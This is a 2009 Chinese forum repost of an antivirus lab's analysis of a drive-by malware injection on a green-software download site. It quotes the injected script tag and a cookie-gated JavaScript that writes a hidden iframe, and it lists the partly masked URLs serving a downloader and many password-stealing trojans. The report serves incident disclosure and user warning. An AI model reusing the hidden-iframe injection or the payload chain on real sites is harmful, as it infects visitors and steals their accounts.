|
|
【电脑爱好者论坛可能也被挂马】绿色软件站挂马事件近日安天实验室反病毒监测网发现,绿色软件站 (http://www.onegreen.net/index.asp)被黑客植入病毒,利用了Cookies 欺骗漏洞挂马,用户如果访问该网站,会被病毒感染。系统就会自动从恶意网站上下载并运行多个恶意程序。盗取用户敏感信息。
该网站的主页里被插入如下框架:图1
代码:
<script language="JavaScript"
src="http://ad.goosms.cn/adv/onegreen.asp
?cid157&a=&b=&c=&d=&e=&f=" type="text/javascript" id="onegreen"></script>
http://ad.goosms.cn/adv/onegreen.asp?
cid157&a=&b=&c=&d=&e=&f=
得到代码如下:图2
从代码分析并未分析出可疑的地方,对其抓包分析发现利用了Cookies欺骗漏洞挂马。
抓包结果如图3:
从抓包来看出其利用的Cookies 欺骗挂马方式。
www.onegreen.net主站的Cookies信息:
SenFe
uu56
www.onegreen.net
1600
950206336
29906134
247222832
29905933
*
function SenFe() {
.var c = getCookie("SenFe");
.if (c != null) { return; }
.register("uu56");
.document.write("<iframe height=0 width=0 src=' http://count.51yse.com/pic/count1.htm'></iframe>")
SenFe 打开:http://count.51yse.com/pic/count1.htm
http://count.51***.com/pic/count1.htm 代码如下:图4
加密框架调用代码其分别调用以下地址:
http://count.51***.com/pic/left.gif 连接
http://www.ehe****.cn/aa.exe下载木马
http://count.51***.com/pic/logo.gif
http://count.51***.com/pic/head.gif
http://count.51***.com/pic/left.gif 得到结果如下:图5
加密网马。
http://count.51***.com/pic/logo.gif网马代码如下:图6
http://count.51***.com/pic/head.gif得到代码如下:图7
当用户访问http://www.onegreen.net/index.asp时,
系统会自动隐藏下载以下病毒文件:
http://www.ehe****.cn/aa.exe
病毒名:(Trojan-Downloader.Win32.Delf.aze) 下载者木马
一旦运行该木马将下载以下病毒到用户的系统,并运行。
http://www.ehe****.cn/aa/1.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.njs) 游戏盗号木马
http://www.ehe****.cn/aa/2.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.nhs) 游戏盗号木马
http://www.ehe****.cn/aa/3.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.nml) 盗号木马
http://www.ehe****.cn/aa/4.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.niy) 盗号木马
http://www.ehe****.cn/aa/5.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.nkn) 游戏盗号木马
http://www.ehe****.cn/aa/6.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.ncu) 游戏盗号木马
http://www.ehe****.cn/aa/7.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.nim) 盗号木马
http://www.ehe****.cn/aa/8.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.nga) 盗号木马
http://www.ehe****.cn/aa/9.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.nkh) 游戏木马
http://www.ehe****.cn/aa/10.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.njv) 游戏木马
http://www.ehe****.cn/aa/11.exe
病毒名:( ) 地址失效
http://www.ehe****.cn/aa/12.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.nio) 游戏盗号木马
http://www.ehe****.cn/aa/13.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.nil) 游戏盗号木马
http://www.ehe****.cn/aa/14.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.nii) 游戏盗号木马
http://www.ehe****.cn/aa/15.exe
病毒名:(Trojan-PSW.Win32.WOW.aio) 游戏木马
http://www.ehe****.cn/aa/16.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.nmc) 游戏盗号木马
http://www.ehe****.cn/aa/17.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.nez) 游戏木马
http://www.ehe****.cn/aa/18.exe
病毒名:(Virus.Win32.AutoRun.aq) AutoRun变种木马
http://www.ehe****.cn/aa/19.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.ned) 游戏木马
http://www.ehe****.cn/aa/20.exe
病毒名:(Trojan-PSW.Win32.QQPass.amy) QQ盗号木马
现在估计电脑爱好者论坛也被挂马,检测到:木马程序 Trojan-Clicker.JS.Small.c URL: http://www.cfan.com.cn/map/error.shtml,只是供大家参考下,任何网站都存在隐患,我在这发过100个安全工具谱,可惜没人看,哎!~希望广大的朋友别成为别人的肉鸡,cfan是我的启蒙地,我就不全面的讲解了!安全防范要做好 |
|
IP卡
狗仔卡
发表于 2009-1-10 20:56:52
收藏
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡
发表于 2009-10-25 20:05:11